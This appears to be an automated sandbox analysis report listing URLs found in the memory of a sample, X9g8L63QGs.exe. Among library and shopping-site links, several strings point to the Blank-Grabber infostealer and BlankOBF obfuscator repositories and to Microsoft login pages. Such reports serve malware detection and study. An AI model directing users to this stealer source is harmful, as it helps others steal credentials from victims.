              Source: X9g8L63QGs.exe, 00000007.00000002.1693650050.000001E7C2780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C24BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: X9g8L63QGs.exe, 00000007.00000003.1286894963.000001E7C3082000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287219139.000001E7C29BD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287263536.000001E7C2D30000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1287314117.000001E7C2D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515DFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: X9g8L63QGs.exe, 00000007.00000003.1279178659.000001E7C2577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4df
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: X9g8L63QGs.exe, 00000007.00000002.1693137251.000001E7C2440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: X9g8L63QGs.exe, 00000007.00000003.1688465803.000001E7C28C2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290104191.000001E7C2D9F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290046859.000001E7C2E0D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694008349.000001E7C29A2000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691953051.000001E7C29A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C3380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: X9g8L63QGs.exe, 00000007.00000002.1692775608.000001E7C0B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 00000046.00000002.1499829000.00000175156AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: X9g8L63QGs.exe, 00000007.00000002.1694834714.000001E7C2D9A000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C33D4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: X9g8L63QGs.exe, 00000007.00000003.1691163799.000001E7C25DA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693898892.000001E7C28C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3898000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 00000014.00000002.1488439935.000002452B935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.0000017524565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1499829000.0000017515E59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1571908950.00000175246A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000046.00000002.1499829000.0000017515C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: X9g8L63QGs.exe, 00000007.00000002.1694449403.000001E7C2A80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: X9g8L63QGs.exe, 00000007.00000002.1709310873.000001E7C39E3000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: X9g8L63QGs.exe, 00000007.00000002.1694660659.000001E7C2B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp?s
              Source: X9g8L63QGs.exe, 00000004.00000003.1275216762.000001FB29EE0000.00000004.00000020.00020000.00000000.sdmp, rar.exe.4.drString found in binary or memory: https://sectigo.com/CPS0
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709657998.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1464140518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481621121.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1688159518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
              Source: X9g8L63QGs.exe, 00000007.00000003.1462666866.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691006091.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445882054.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1408663369.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1482149453.000001E7C29FF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1694260601.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1450291264.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1456637981.000001E7C2A0E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691509541.000001E7C2E41000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2E3D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2DF9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1290762711.000001E7C2DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691353377.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1693315105.000001E7C2586000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2F4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: X9g8L63QGs.exe, 00000007.00000002.1697306895.000001E7C3180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1692076374.000001E7C2EBC000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1695917994.000001E7C2EBD000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1691987395.000001E7C2EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
              Source: X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EB4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C38D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: X9g8L63QGs.exe, 00000007.00000002.1697474979.000001E7C32E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C346C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3874000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: X9g8L63QGs.exe, 00000007.00000003.1592918762.000001E7C3A1C000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1590666816.000001E7C3EBB000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593098042.000001E7C2A00000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1709657998.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1698377076.000001E7C339C000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3858000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A16000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481621121.000001E7C3A16000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1464140518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1481621121.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1688159518.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: X9g8L63QGs.exe, 00000007.00000002.1701157947.000001E7C3884000.00000004.00001000.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1593207468.000001E7C2FDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1483776725.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1461372548.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2EA5000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3983000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1441716609.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1432565672.000001E7C29E9000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1413736989.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1431878807.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1457946992.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1454766245.000001E7C2FDE000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1423636617.000001E7C2FD4000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1428143549.000001E7C3A20000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445232213.000001E7C3A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: X9g8L63QGs.exe, 00000007.00000003.1481477525.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000003.1445056949.000001E7C3ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
